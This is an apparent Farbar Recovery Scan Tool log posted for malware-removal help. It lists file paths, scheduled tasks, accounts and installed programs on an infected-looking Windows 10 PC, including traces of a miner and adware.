2018-05-24 11:24 - 2018-05-24 11:24 - 000103120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2018-05-24 11:24 - 2018-05-24 11:24 - 000035456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2018-05-24 11:24 - 2018-05-24 11:24 - 000035456 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 004492288 _____ (Microsoft Corporation) C:\Windows\system32\xpsrchvw.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 003398144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsrchvw.exe
2018-05-24 11:23 - 2018-05-24 11:23 - 000925696 _____ (Microsoft Corporation) C:\Windows\system32\XpsFilt.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsFilt.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000100352 _____ (Microsoft Corporation) C:\Windows\system32\XPSSHHDR.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000082432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XPSSHHDR.dll
2018-05-24 11:23 - 2018-05-24 11:23 - 000076060 _____ C:\Windows\SysWOW64\xpsrchvw.xml
2018-05-24 11:23 - 2018-05-24 11:23 - 000076060 _____ C:\Windows\system32\xpsrchvw.xml
2018-05-24 11:22 - 2018-05-24 11:22 - 003331584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NlsLexicons0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 003331584 _____ (Microsoft Corporation) C:\Windows\system32\NlsLexicons0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 001914880 _____ (Microsoft Corporation) C:\Windows\system32\MLS2.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 001866752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MLS2.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 000166912 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0018.dll
2018-05-24 11:22 - 2018-05-24 11:22 - 000131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NlsData0018.dll
2018-05-24 09:59 - 2018-05-24 10:05 - 000656668 _____ C:\Windows\Minidump\052418-65906-01.dmp
2018-05-24 09:59 - 2018-05-24 09:59 - 561529806 _____ C:\Windows\MEMORY.DMP
2018-05-24 09:59 - 2018-05-24 09:59 - 000000000 ____D C:\Windows\Minidump
2018-05-24 09:01 - 2018-05-24 09:01 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\EpicNet Inc
2018-05-24 09:01 - 2018-05-24 09:01 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-24 09:00 - 2018-05-24 09:00 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-24 08:58 - 2018-05-24 08:58 - 000003678 _____ C:\Windows\System32\Tasks\FastDataX Task
2018-05-24 08:56 - 2018-06-10 11:59 - 000003602 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-24 08:56 - 2018-06-10 11:59 - 000003246 _____ C:\Windows\System32\Tasks\csrss
2018-05-24 08:56 - 2018-05-24 08:58 - 009159064 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2018-05-24 08:56 - 2018-05-24 08:58 - 001258280 _____ (Microsoft Corporation) C:\Windows\system32\osloader.exe
2018-05-24 08:48 - 2018-05-24 08:48 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\SystemHealer
2018-05-24 08:45 - 2018-06-11 07:56 - 000003644 _____ C:\Windows\System32\Tasks\CreateExplorerShellUnelevatedTask
2018-05-24 08:45 - 2018-06-10 12:02 - 000000618 __RSH C:\ProgramData\ntuser.pol
2018-05-24 08:44 - 2018-05-24 10:02 - 000016796 _____ C:\Windows\System32\Tasks\LangaCount
2018-05-24 08:44 - 2018-05-24 08:44 - 000000000 ____D C:\Program Files\My Program
2018-05-24 08:44 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-24 08:41 - 2018-05-24 08:41 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\FastDataX
2018-05-24 08:40 - 2018-06-09 21:21 - 000929792 _____ C:\Users\Craciun\AppData\Local\sham.db
2018-05-24 08:40 - 2018-06-03 08:37 - 000048288 _____ C:\Users\Craciun\AppData\Local\InstallationConfiguration.xml
2018-05-24 08:39 - 2018-05-24 20:33 - 000000000 ____D C:\Program Files (x86)\ShutdownTime
2018-05-24 08:39 - 2018-05-24 20:32 - 000000000 ____D C:\Program Files (x86)\Multitimer
2018-05-24 08:36 - 2018-05-24 20:32 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-05-24 08:36 - 2018-05-24 08:39 - 000000000 ____D C:\Program Files (x86)\trs
2018-05-24 08:36 - 2018-05-24 08:37 - 000000000 ____D C:\ProgramData\yahoochrome_D
2018-05-24 08:34 - 2018-06-11 20:27 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\WidModule
2018-05-24 08:34 - 2018-05-24 08:34 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-24 08:33 - 2018-05-24 08:33 - 000003290 _____ C:\Windows\System32\Tasks\jgvcz
2018-05-24 08:33 - 2018-05-24 08:33 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\dwirn
2018-05-24 08:33 - 2018-05-24 08:33 - 000000000 ____D C:\Users\Craciun\AppData\Local\XService
2018-05-24 08:32 - 2018-05-24 08:32 - 000003614 _____ C:\Windows\System32\Tasks\PPI Update
2018-05-24 08:32 - 2018-05-24 08:32 - 000000000 ____D C:\Program Files (x86)\Microsoft Toolkit Final
2018-05-24 05:00 - 2018-06-10 12:03 - 000000000 ____D C:\Users\Craciun\AppData\LocalLow\uTorrent
2018-05-24 04:59 - 2018-05-24 04:59 - 000000000 ____D C:\ProgramData\Microsoft OneDrive
2018-05-24 01:18 - 2018-05-24 01:18 - 000000020 ___SH C:\Users\Craciun\ntuser.ini
2018-05-24 01:17 - 2018-06-10 13:00 - 000004162 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{B9EC313A-5AB5-4A11-BDEE-ABAC3891FA74}
2018-05-24 01:17 - 2018-06-10 11:57 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-05-24 01:17 - 2018-05-24 01:17 - 000014460 _____ C:\Windows\System32\Tasks\Acronis Bar Analyptian
2018-05-24 01:17 - 2018-05-24 01:17 - 000003346 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2018-05-24 01:17 - 2018-05-24 01:17 - 000003122 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2018-05-24 01:17 - 2018-05-24 01:17 - 000003044 _____ C:\Windows\System32\Tasks\update-S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:17 - 2018-05-24 01:17 - 000002860 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:17 - 2018-05-24 01:17 - 000002788 _____ C:\Windows\System32\Tasks\update-sys
2018-05-24 01:17 - 2018-05-24 01:17 - 000002768 _____ C:\Windows\System32\Tasks\AdobeAAMUpdater-1.0-Craciun-PC-Craciun
2018-05-24 01:17 - 2018-05-24 01:17 - 000002716 _____ C:\Windows\System32\Tasks\AdobeGCInvoker-1.0-ALEX-PC-Craciun
2018-05-24 01:17 - 2018-05-24 01:17 - 000002568 _____ C:\Windows\System32\Tasks\Driver Booster Scheduler
2018-05-24 01:17 - 2018-05-24 01:17 - 000002282 _____ C:\Windows\System32\Tasks\Driver Booster SkipUAC (Craciun)
2018-05-24 01:17 - 2018-05-24 01:17 - 000002262 _____ C:\Windows\System32\Tasks\UMonitor Task
2018-05-24 01:17 - 2018-05-24 01:17 - 000000000 ____D C:\Windows\System32\Tasks\S-1-5-21-3764278317-3264620232-1554668131-1000
2018-05-24 01:15 - 2018-05-24 01:17 - 000007623 _____ C:\Windows\diagwrn.xml
2018-05-24 01:15 - 2018-05-24 01:17 - 000007623 _____ C:\Windows\diagerr.xml
2018-05-24 01:06 - 2018-06-05 10:15 - 000838560 _____ C:\Windows\system32\PerfStringBackup.INI
2018-05-24 00:56 - 2018-05-24 00:56 - 000001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2018-05-24 00:52 - 2018-06-09 18:13 - 000000000 ____D C:\Users\Craciun
2018-05-24 00:52 - 2018-04-12 02:34 - 000001105 _____ C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-05-24 00:51 - 2018-05-24 00:51 - 000000000 ____D C:\ProgramData\USOShared
2018-05-24 00:50 - 2018-04-12 02:33 - 002752000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2018-05-24 00:46 - 2018-06-11 00:36 - 000000000 ____D C:\Windows\system32\SleepStudy
2018-05-24 00:46 - 2018-05-24 01:00 - 000765520 _____ C:\Windows\system32\FNTCACHE.DAT
2018-05-21 11:01 - 2018-05-24 01:18 - 000000000 ___DC C:\Windows\Panther
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2018-06-11 20:33 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\AppReadiness
2018-06-11 20:29 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Sawmenger XP
2018-06-11 20:29 - 2017-04-29 05:15 - 000000000 ___RD C:\Users\Craciun\OneDrive
2018-06-11 20:25 - 2018-04-12 02:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-06-11 08:00 - 2017-05-01 16:40 - 000000000 ____D C:\Users\Craciun\AppData\Local\Adobe
2018-06-11 00:37 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\LiveKernelReports
2018-06-10 12:04 - 2017-04-29 05:39 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\uTorrent
2018-06-10 11:56 - 2018-04-12 00:04 - 000524288 _____ C:\Windows\system32\config\BBI
2018-06-09 21:20 - 2017-05-01 16:47 - 000000000 ____D C:\ProgramData\Package Cache
2018-06-09 18:38 - 2017-04-30 00:19 - 000000420 _____ C:\Users\Craciun\Desktop\This PC - Shortcut.lnk
2018-06-09 16:44 - 2018-03-08 12:54 - 000000000 ____D C:\Program Files (x86)\AP Tuner
2018-06-08 16:32 - 2018-04-12 02:30 - 000000000 ____D C:\Windows\CbsTemp
2018-06-08 10:47 - 2017-04-29 05:04 - 000000000 ____D C:\Users\Craciun\AppData\Local\VirtualStore
2018-06-05 10:15 - 2018-04-12 02:36 - 000000000 ____D C:\Windows\INF
2018-06-04 19:53 - 2018-04-12 02:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-05-27 14:09 - 2017-07-06 10:05 - 000000000 ____D C:\Program Files\DAEMON Tools Pro
2018-05-26 14:24 - 2017-07-28 01:28 - 000002307 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-05-26 14:24 - 2017-07-28 01:28 - 000002272 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2018-05-25 17:42 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Windows Defender
2018-05-25 17:32 - 2018-04-12 02:38 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2018-05-25 17:27 - 2017-08-13 00:56 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-05-25 17:16 - 2017-04-29 09:24 - 000000000 ____D C:\Program Files (x86)\UnHackMe
2018-05-24 23:14 - 2017-04-20 10:04 - 000000000 ____D C:\Users\Craciun\Documents\RegRun2
2018-05-24 23:09 - 2017-04-20 10:04 - 000000000 ____D C:\Users\Public\Documents\regruninfo
2018-05-24 22:55 - 2017-04-29 09:25 - 000000000 ____D C:\ProgramData\RegRun
2018-05-24 11:45 - 2018-04-12 02:41 - 000000000 ____D C:\Windows\Setup
2018-05-24 11:45 - 2018-04-12 02:38 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 __RHD C:\Users\Public\Libraries
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\WinBioDatabase
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\spool
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\oobe
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\NDF
2018-05-24 11:45 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2018-05-24 11:45 - 2018-01-04 14:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2018-05-24 11:45 - 2017-12-22 20:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BS.Player
2018-05-24 11:45 - 2017-09-29 16:46 - 000000000 ____D C:\Windows\system32\Tasks_Migrated
2018-05-24 11:45 - 2017-08-28 21:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2018-05-24 11:45 - 2017-07-28 10:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2018-05-24 11:45 - 2017-07-27 09:57 - 000000000 ____D C:\Windows\system32\MpEngineStore
2018-05-24 11:45 - 2017-07-06 10:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DAEMON Tools Pro
2018-05-24 11:45 - 2017-05-03 19:44 - 000000000 ____D C:\Windows\system32\appmgmt
2018-05-24 11:45 - 2017-05-01 17:02 - 000000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2018-05-24 11:45 - 2017-04-30 01:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2018-05-24 11:45 - 2017-03-19 00:03 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-05-24 11:41 - 2017-04-29 05:08 - 000000000 ____D C:\Windows\system32\SRSLabs
2018-05-24 11:40 - 2017-04-29 05:08 - 000000000 ____D C:\Program Files\Realtek
2018-05-24 11:35 - 2018-04-12 12:37 - 000000000 ____D C:\Windows\Containers
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\TextInput
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\SysWOW64\setup
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\ta-in
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\si-lk
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\setup
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\appraiser
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\system32\am-et
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\Provisioning
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\bcastdvr
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2018-05-24 11:35 - 2018-04-12 02:38 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2018-05-24 11:23 - 2018-04-12 12:19 - 000000000 ____D C:\Windows\OCR
2018-05-24 09:59 - 2017-04-29 05:11 - 000000000 ____D C:\Program Files (x86)\Google
2018-05-24 08:36 - 2017-04-29 05:10 - 000000000 ____D C:\Program Files\Synaptics
2018-05-24 05:08 - 2017-12-09 22:34 - 000000000 ____D C:\Users\Craciun\AppData\Local\Packages
2018-05-24 05:03 - 2018-04-12 02:38 - 000000000 ___RD C:\Windows\PrintDialog
2018-05-24 04:15 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\appcompat
2018-05-24 01:20 - 2017-12-09 23:00 - 000000000 ___RD C:\Users\Craciun\3D Objects
2018-05-24 01:20 - 2017-04-29 05:05 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-05-24 01:18 - 2018-04-12 00:04 - 000032768 _____ C:\Windows\system32\config\ELAM
2018-05-24 01:14 - 2018-04-12 02:38 - 000000000 ____D C:\Windows\Registration
2018-05-24 01:06 - 2017-12-09 22:52 - 000022840 _____ C:\Windows\system32\emptyregdb.dat
2018-05-24 00:58 - 2017-04-30 01:10 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2018-05-24 00:58 - 2016-12-22 15:38 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2018-05-24 00:58 - 2016-12-06 10:42 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2018-05-24 00:55 - 2017-09-10 14:35 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Warzone
2018-05-24 00:55 - 2017-06-19 10:36 - 000000000 ____D C:\Users\Craciun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WhatsApp
2018-05-24 00:51 - 2018-04-12 02:38 - 000000000 ____D C:\ProgramData\USOPrivate
2018-05-24 00:51 - 2017-05-04 00:15 - 000000000 ____D C:\Windows\SysWOW64\sda
2018-05-24 00:50 - 2017-04-29 05:08 - 000000000 ____D C:\Windows\SysWOW64\RTCOM
 
==================== Files in the root of some directories =======
 
2016-12-25 13:08 - 2016-12-25 13:09 - 000000423 _____ () C:\Users\Craciun\update-csgo.bat
2017-10-20 22:07 - 2016-11-22 20:41 - 000021718 _____ () C:\Program Files (x86)\EULA.ro
2017-11-15 18:06 - 2017-11-15 18:06 - 007649280 _____ () C:\Program Files (x86)\GUTA61F.tmp
2018-05-25 02:01 - 2018-05-25 02:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-30 20:48 - 2018-05-30 19:55 - 000094208 _____ (scaxvnlzpnrzqclaez) C:\Users\Craciun\AppData\Roaming\command.dll
2018-05-30 20:48 - 2018-05-30 19:05 - 000623616 _____ (rsltggjgfwnwdwxcud) C:\Users\Craciun\AppData\Roaming\product.dll
2017-07-05 18:38 - 2017-12-08 10:48 - 000001456 _____ () C:\Users\Craciun\AppData\Local\Adobe Save for Web 13.0 Prefs
2018-05-26 14:22 - 2018-05-26 14:22 - 007611392 _____ () C:\Users\Craciun\AppData\Local\agent.dat
2018-05-26 14:22 - 2018-05-26 14:20 - 002136576 _____ (TODO: <Company name>) C:\Users\Craciun\AppData\Local\Biojob.exe
2018-05-26 14:22 - 2018-05-26 14:22 - 001987417 _____ () C:\Users\Craciun\AppData\Local\Biojob.tst
2018-05-26 14:22 - 2018-05-26 14:22 - 000070896 _____ () C:\Users\Craciun\AppData\Local\Config.xml
2018-05-24 08:40 - 2018-06-03 08:37 - 000048288 _____ () C:\Users\Craciun\AppData\Local\InstallationConfiguration.xml
2017-04-29 09:25 - 2017-04-29 09:25 - 000140800 _____ () C:\Users\Craciun\AppData\Local\installer.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000018432 _____ () C:\Users\Craciun\AppData\Local\Main.dat
2018-05-26 14:22 - 2018-05-26 14:22 - 000005568 _____ () C:\Users\Craciun\AppData\Local\md.xml
2018-05-26 14:22 - 2018-05-26 14:22 - 000126464 _____ () C:\Users\Craciun\AppData\Local\noah.dat
2018-05-24 08:40 - 2018-06-09 21:21 - 000929792 _____ () C:\Users\Craciun\AppData\Local\sham.db
2018-05-26 14:21 - 2018-05-26 14:21 - 000278510 _____ () C:\Users\Craciun\AppData\Local\Statphase.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 001895382 _____ () C:\Users\Craciun\AppData\Local\Subity.bin
2018-05-26 14:23 - 2018-05-26 14:23 - 000032038 _____ () C:\Users\Craciun\AppData\Local\uninstall_temp.ico
2018-01-04 14:51 - 2018-01-04 14:51 - 000000003 _____ () C:\Users\Craciun\AppData\Local\updater.log
2018-01-04 14:51 - 2018-01-04 14:51 - 000000425 _____ () C:\Users\Craciun\AppData\Local\UserProducts.xml
 
Files to move or delete:
====================
C:\Windows\rss\csrss.exe
C:\Users\Craciun\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
C:\Users\Craciun\AppData\Roaming\MaxiBuy\python\pythonw.exe
C:\Users\Craciun\AppData\Local\Temp\UCF4SO8U9O\UCF4.exe
 
 
Some files in TEMP:
====================
2018-05-24 08:56 - 2018-05-24 08:56 - 001527488 _____ (Microsoft Corporation) C:\Users\Craciun\AppData\Local\Temp\dbghelp.dll
2018-06-08 10:48 - 2018-06-09 12:19 - 000193536 _____ () C:\Users\Craciun\AppData\Local\Temp\gB3FF.tmp.exe
2018-05-24 08:39 - 2018-05-24 08:39 - 000375522 _____ (                                                            ) C:\Users\Craciun\AppData\Local\Temp\m2mw4j5chbx.exe
2018-05-24 08:56 - 2018-05-24 08:56 - 000167616 _____ (Microsoft Corporation) C:\Users\Craciun\AppData\Local\Temp\symsrv.dll
2018-05-24 20:33 - 2018-05-24 20:33 - 000052736 _____ (Z7DRQ) C:\Users\Craciun\AppData\Local\Temp\TPPHLGU5RQM8.exe
2018-06-11 00:38 - 2018-06-11 00:38 - 002064847 _____ () C:\Users\Craciun\AppData\Local\Temp\xmrig.exe
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully
 
LastRegBack: 2018-05-24 00:46
 
==================== End of FRST.txt ============================
 
And here is Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Craciun (11-06-2018 21:05:29)
Running from C:\Users\Craciun\Desktop
Windows 10 Pro Version 1803 17134.48 (X64) (2018-05-23 22:18:45)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-3764278317-3264620232-1554668131-500 - Administrator - Disabled)
Craciun (S-1-5-21-3764278317-3264620232-1554668131-1000 - Administrator - Enabled) => C:\Users\Craciun
DefaultAccount (S-1-5-21-3764278317-3264620232-1554668131-503 - Limited - Disabled)
Guest (S-1-5-21-3764278317-3264620232-1554668131-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3764278317-3264620232-1554668131-1002 - Limited - Enabled)
WDAGUtilityAccount (S-1-5-21-3764278317-3264620232-1554668131-504 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\uTorrent) (Version: 3.5.3.44396 - BitTorrent Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.5.0.331 - Adobe Systems Incorporated)
Adobe Photoshop CC 2017 (HKLM-x32\...\PHSP_18_1_1) (Version: 18.1.1 - Adobe Systems Incorporated)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
CloudNet (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION
Counter Strike 1.6 Warzone (HKLM-x32\...\{CF809AFF-2000-4A5D-B05D-130C910EF7E0}) (Version: 1.5 - Warzone) Hidden
DAEMON Tools Pro (HKLM\...\DAEMON Tools Pro) (Version: 6.1.0.0484 - Disc Soft Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 66.0.3359.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.17 - Google Inc.) Hidden
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Java 8 Update 161 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180161F0}) (Version: 8.0.1610.12 - Oracle Corporation)
Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains)
Malwarebytes version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Maxi Buy version 1.6.24.1 (HKLM-x32\...\{716D2234-E822-4AB0-874A-1DD7F75047DB}_is1) (Version: 1.6.24.1 - Maxi Buy)
MaxiBuy (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\MaxiBuy) (Version:  - )
Microsoft OneDrive (HKU\S-1-5-21-3764278317-3264620232-1554668131-1000\...\OneDriveSetup.exe) (Version: 18.065.0329.0002 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61187 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61186 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.7523 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40660 (HKLM\...\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40660 (HKLM\...\{CB0836EC-B072-368D-82B2-D3470BF95707}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40660 (HKLM-x32\...\{7DAD0258-515C-3DD4-8964-BD714199E0F7}) (Version: 12.0.40660 - Microsoft Corporation)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40660 (HKLM-x32\...\{E30D8B21-D82D-3211-82CC-0F0A5D1495E8}) (Version: 12.0.40660 - Microsoft Corporation)
